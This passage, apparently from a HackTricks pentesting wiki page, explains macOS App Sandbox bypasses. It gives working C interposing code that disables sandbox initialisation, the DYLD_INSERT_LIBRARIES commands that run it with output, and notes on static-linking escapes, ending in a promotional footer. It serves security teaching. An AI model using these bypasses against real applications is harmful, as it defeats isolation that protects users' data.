**Even with the Sandbox bypassed TCC** will ask the user if he wants to allow the process to read files from desktop
|
||||||
|
{% endhint %}
|
||||||
|
|
||||||
|
### Interposting Bypass
|
||||||
|
|
||||||
|
For more information about **Interposting** check:
|
||||||
|
|
||||||
|
{% content-ref url="../mac-os-architecture/macos-function-hooking.md" %}
|
||||||
|
[macos-function-hooking.md](../mac-os-architecture/macos-function-hooking.md)
|
||||||
|
{% endcontent-ref %}
|
||||||
|
|
||||||
|
#### Interpost `_libsecinit_initializer` to prevent the sandbox
|
||||||
|
|
||||||
|
```c
|
||||||
|
// gcc -dynamiclib interpose.c -o interpose.dylib
|
||||||
|
|
||||||
|
#include <stdio.h>
|
||||||
|
|
||||||
|
void _libsecinit_initializer(void);
|
||||||
|
|
||||||
|
void overriden__libsecinit_initializer(void) {
|
||||||
|
printf("_libsecinit_initializer called\n");
|
||||||
|
}
|
||||||
|
|
||||||
|
__attribute__((used, section("__DATA,__interpose"))) static struct {
|
||||||
|
void (*overriden__libsecinit_initializer)(void);
|
||||||
|
void (*_libsecinit_initializer)(void);
|
||||||
|
}
|
||||||
|
_libsecinit_initializer_interpose = {overriden__libsecinit_initializer, _libsecinit_initializer};
|
||||||
|
```
|
||||||
|
|
||||||
|
```bash
|
||||||
|
DYLD_INSERT_LIBRARIES=./interpose.dylib ./sand
|
||||||
|
_libsecinit_initializer called
|
||||||
|
Sandbox Bypassed!
|
||||||
|
```
|
||||||
|
|
||||||
|
#### Interpost `__mac_syscall` to prevent the Sandbox
|
||||||
|
|
||||||
|
{% code title="interpose.c" %}
|
||||||
|
```c
|
||||||
|
// gcc -dynamiclib interpose.c -o interpose.dylib
|
||||||
|
|
||||||
|
#include <stdio.h>
|
||||||
|
#include <string.h>
|
||||||
|
|
||||||
|
// Forward Declaration
|
||||||
|
int __mac_syscall(const char *_policyname, int _call, void *_arg);
|
||||||
|
|
||||||
|
// Replacement function
|
||||||
|
int my_mac_syscall(const char *_policyname, int _call, void *_arg) {
|
||||||
|
printf("__mac_syscall invoked. Policy: %s, Call: %d\n", _policyname, _call);
|
||||||
|
if (strcmp(_policyname, "Sandbox") == 0 && _call == 0) {
|
||||||
|
printf("Bypassing Sandbox initiation.\n");
|
||||||
|
return 0; // pretend we did the job without actually calling __mac_syscall
|
||||||
|
}
|
||||||
|
// Call the original function for other cases
|
||||||
|
return __mac_syscall(_policyname, _call, _arg);
|
||||||
|
}
|
||||||
|
|
||||||
|
// Interpose Definition
|
||||||
|
struct interpose_sym {
|
||||||
|
const void *replacement;
|
||||||
|
const void *original;
|
||||||
|
};
|
||||||
|
|
||||||
|
// Interpose __mac_syscall with my_mac_syscall
|
||||||
|
__attribute__((used)) static const struct interpose_sym interposers[] __attribute__((section("__DATA, __interpose"))) = {
|
||||||
|
{ (const void *)my_mac_syscall, (const void *)__mac_syscall },
|
||||||
|
};
|
||||||
|
```
|
||||||
|
{% endcode %}
|
||||||
|
|
||||||
|
```bash
|
||||||
|
DYLD_INSERT_LIBRARIES=./interpose.dylib ./sand
|
||||||
|
|
||||||
|
__mac_syscall invoked. Policy: Sandbox, Call: 2
|
||||||
|
__mac_syscall invoked. Policy: Sandbox, Call: 2
|
||||||
|
__mac_syscall invoked. Policy: Sandbox, Call: 0
|
||||||
|
Bypassing Sandbox initiation.
|
||||||
|
__mac_syscall invoked. Policy: Quarantine, Call: 87
|
||||||
|
__mac_syscall invoked. Policy: Sandbox, Call: 4
|
||||||
|
Sandbox Bypassed!
|
||||||
|
```
|
||||||
|
|
||||||
|
### Static Compiling & Dynamically linking
|
||||||
|
|
||||||
|
[**This research**](https://saagarjha.com/blog/2020/05/20/mac-app-store-sandbox-escape/) discovered 2 ways to bypass the Sandbox. Because the sandbox is applied from userland when the **libSystem** library is loaded. If a binary could avoid loading it, it would never get sandboxed:
|
||||||
|
|
||||||
|
* If the binary was **completely statically compiled**, it could avoid loading that library.
|
||||||
|
* If the **binary wouldn't need to load any libraries** (because the linker is also in libSystem), it won't need to load libSystem. 
|
||||||
|
|
||||||
|
### Shellcodes
|
||||||
|
|
||||||
|
Note that **even shellcodes** in ARM64 needs to be linked in `libSystem.dylib`:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
ld -o shell shell.o -macosx_version_min 13.0
|
||||||
|
ld: dynamic executables or dylibs must link with libSystem.dylib for architecture arm64
|
||||||
|
```
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [http://newosxbook.com/files/HITSB.pdf](http://newosxbook.com/files/HITSB.pdf)
|
||||||
|
* [https://saagarjha.com/blog/2020/05/20/mac-app-store-sandbox-escape/](https://saagarjha.com/blog/2020/05/20/mac-app-store-sandbox-escape/)
|
||||||
|
|
||||||
|
<details>
|
||||||
|
|
||||||
|
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
|
||||||
|
|
||||||
|
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||||
|
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||||
|
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||||
|
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||||
|
* **Share your hacking tricks by submitting PRs to the** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **and** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud).
|
||||||
|
|
||||||
|
</details>
|